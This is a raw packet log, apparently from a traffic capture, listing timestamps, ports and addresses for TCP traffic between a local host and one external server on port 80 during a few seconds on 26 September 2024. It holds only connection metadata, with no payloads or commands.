Sep 26, 2024 11:33:27.435514927 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.435537100 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.435548067 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.435560942 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.435570955 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.435585022 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.435600996 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.435617924 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.435620070 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.435650110 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.435662985 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.435678959 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.435693979 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.435694933 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.435709953 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.435728073 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.435738087 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.435743093 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.435765028 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.435800076 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.436124086 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.436137915 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.436161041 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.436180115 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.436186075 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.436199903 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.436201096 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.436217070 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.436232090 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.436235905 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.436258078 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.436259031 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.436280012 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.436295033 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.436295986 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.436312914 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.436323881 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.436330080 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.436346054 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.436359882 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.436374903 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.436381102 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.436381102 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.436410904 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.436423063 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.436460972 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.483699083 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.483719110 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.483736038 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.483752966 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.483763933 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.483776093 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.483794928 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.483825922 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.483906031 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.483916998 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.483928919 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.483942986 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.483953953 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.483954906 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.483969927 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.483994007 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484030962 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484030962 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484076977 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484097004 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484107018 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484123945 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484149933 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484150887 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484163046 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484174967 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484206915 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484231949 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484267950 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484280109 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484292030 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484313965 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484334946 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484345913 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484380960 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484411001 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484421968 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484427929 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484433889 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484462023 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484479904 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484503984 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484515905 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484527111 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484551907 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484571934 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484599113 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484610081 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484621048 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484632969 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484652042 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484683037 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484683037 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484699011 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484715939 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484725952 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484728098 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484764099 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484791994 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484791994 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484802961 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484814882 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484843016 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484873056 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484875917 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484886885 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484918118 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484937906 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.484946966 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484957933 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484968901 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484982967 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.484991074 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485013962 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485044003 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485045910 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485054970 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485073090 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485085011 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485090017 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485105991 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485125065 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485125065 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485135078 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485152960 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485184908 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485210896 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485223055 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485235929 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485260010 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485280037 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485304117 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485316038 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485325098 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485337973 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485347986 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485368013 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485390902 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485402107 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485404015 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485419989 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485434055 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485455036 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485456944 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485467911 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485516071 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485524893 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485533953 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485543966 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485562086 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485575914 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485589981 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485594034 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485603094 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485619068 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485646009 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485656023 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485667944 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485678911 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485704899 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485732079 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485743999 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485754013 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485764980 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485776901 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485784054 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485788107 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485799074 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485832930 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485846996 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.485858917 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.485909939 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.522887945 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.522906065 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.522928953 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.522944927 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.522958994 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.522973061 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.522980928 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.523036003 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.523042917 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.523056984 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.523083925 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.523104906 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.523118019 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.523119926 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.523135900 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.523150921 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.523150921 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.523165941 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.523180008 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.523180008 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.523216009 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.523221016 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.523232937 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.523232937 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.523269892 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.523277044 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.523283005 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.523288965 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.523305893 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.523322105 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.523334026 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.523354053 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.523405075 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.523410082 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.523453951 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.523746014 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:27.523787975 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:27.855798006 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:28.153147936 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:28.762512922 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:28.809504032 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:28.810383081 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:28.810731888 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:29.525377989 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:29.525561094 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:29.607295036 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:29.612174988 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:30.339371920 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:30.339549065 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:31.105992079 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:31.110773087 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:31.823221922 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:31.823354006 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.213787079 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.218718052 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.431807041 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.431832075 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.431844950 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.431863070 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.431874990 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.431896925 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.431907892 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.431919098 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.431921959 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.431951046 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.431963921 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.431972027 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.431989908 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.432020903 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.432030916 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.432044029 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.432071924 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.432096004 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.556499958 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.556515932 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.556525946 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.556592941 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.556607008 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.556617975 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.556633949 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.556644917 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.556648016 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.556699038 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.556704998 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.556716919 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.556729078 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.556746006 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.556746960 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.556760073 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.556775093 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.556802988 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.556828976 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.556842089 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.556855917 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.556868076 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.556868076 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.556901932 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.556927919 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.556937933 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.556950092 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.556984901 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.556986094 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.556993961 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.556998968 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.557022095 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.557035923 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.557039976 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.557051897 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.557064056 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.557075024 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.557075977 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.557095051 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.557110071 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.681323051 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.681350946 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.681363106 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.681406975 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.681425095 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.681435108 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.681447983 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.681461096 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.681474924 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.681488991 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.681493044 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.681504965 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.681507111 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.681519032 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.681541920 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.681570053 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.681570053 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.681583881 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.681608915 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.681648970 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.681653023 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.681664944 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.681675911 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.681689024 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.681688070 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.681704044 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.681708097 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.681741953 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.681747913 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.681755066 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.681767941 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.681782961 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.681813002 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.681910038 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.681951046 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.681960106 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.681987047 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.681996107 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.682044029 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:32.682054996 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.682069063 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:32.682099104 CEST	49705	80	192.168.2.9	185.215.113.37
